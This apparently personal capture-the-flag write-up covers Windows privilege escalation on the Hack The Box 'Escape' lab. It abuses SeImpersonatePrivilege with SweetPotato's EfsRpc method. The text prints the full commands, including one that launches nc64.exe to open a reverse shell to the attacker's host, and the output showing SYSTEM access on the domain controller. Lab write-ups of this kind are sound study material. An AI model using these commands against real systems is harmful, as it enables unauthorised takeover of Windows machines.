InfoSec LAB

Escape_Privilege_Escalation_2

Created: 2 min read

SweetPotato

As discovered previously, the sql_svc user has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. this makes the target system vulnerable to the potato exploits

while juicypotato for token impersonation does not work on anything above windows 10 1809 & windows server 2019, i should be able to use sweetpotato

sweetpotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:

  •     RottenPotato
  •     Weaponized JuciyPotato with BITS WinRM discovery
  •     PrintSpoofer discovery and original exploit
  •     EfsRpc built on EfsPotato
  •     PetitPotam

Exploit

The binary can be downloaded from the official GitHub repo

Exploitation

*evil-winrm* ps c:\tmp> copy \\10.10.14.20\smb\SweetPotato.exe C:\tmp\SweetPotato.exe

Delivery complete

ps c:\tmp> .\SweetPotato.exe -p "C:\tmp\nc64.exe" -a "10.10.14.20 1234 -e cmd" -e EfsRpc
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] attempting np impersonation using method efsrpc to launch c:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/faa2e271-10d0-414d-85bd-8387db4e87f8/\faa2e271-10d0-414d-85bd-8387db4e87f8\faa2e271-10d0-414d-85bd-8387db4e87f8
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

the command above uses the esfrpc method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege

┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ nnc 1234                        
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.202] 50669
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
 whoami
nt authority\system
 
c:\Windows\system32> hostname
 hostname
dc
 
c:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::21c
   ipv6 address. . . . . . . . . . . : dead:beef::31e1:eb54:2784:d5cd
   link-local ipv6 address . . . . . : fe80::31e1:eb54:2784:d5cd%4
   ipv4 address. . . . . . . . . . . : 10.10.11.202
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%4
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks